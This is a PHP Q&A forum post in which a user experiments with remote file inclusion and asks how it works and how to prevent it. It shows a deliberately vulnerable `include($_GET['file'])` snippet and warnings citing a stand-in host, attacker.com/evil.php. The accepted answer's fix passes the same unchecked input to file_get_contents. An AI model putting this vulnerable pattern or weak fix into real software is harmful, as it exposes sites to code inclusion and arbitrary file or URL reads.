# Could not include file using PHP

Tags: php, include

I have an issue. I was testing how remote file inclusion injection and tried to include the file from URL query string using PHP. But here I am getting some warning messages. I am explaining my code below.

```
<?php
$file = $_GET['file'];
include($file);
?>
```

I am getting the following messages.

```
Warning: include(): http:// wrapper is disabled in the server configuration by allow_url_include=0 in /opt/lampp/htdocs/test/remote.php on line 3

Warning: include(http://attacker.com/evil.php): failed to open stream: no suitable wrapper could be found in /opt/lampp/htdocs/test/remote.php on line 3

Warning: include(): Failed opening 'http://attacker.com/evil.php' for inclusion (include_path='.:/opt/lampp/lib/php') in /opt/lampp/htdocs/test/remote.php on line 3
```

Here I am calling remote file like this `http://localhost/test/remote.php?file=http://kooleedback.com/about.php`. Here I need to know how it can be successfully included and  also how it can be prevented.

Answer (score 4, accepted):

Your server has the `allow_url_include` option disabled. This means you can only access local files with `include()`, not external URLs.

In general it doesn't make sense to use `include()` with a remote `.php` URL. When you request a `.php` file from a server, it doesn't return the source code, it executes the script and returns the output. But `include()` needs to get PHP code, which it executes as if it were in the including script.

If you want to get that remote data you should use `file_get_contents($file)`, not `include($file)`.

Comment: Yes, after implementing as per you the messages gone bit where it is including i can not know.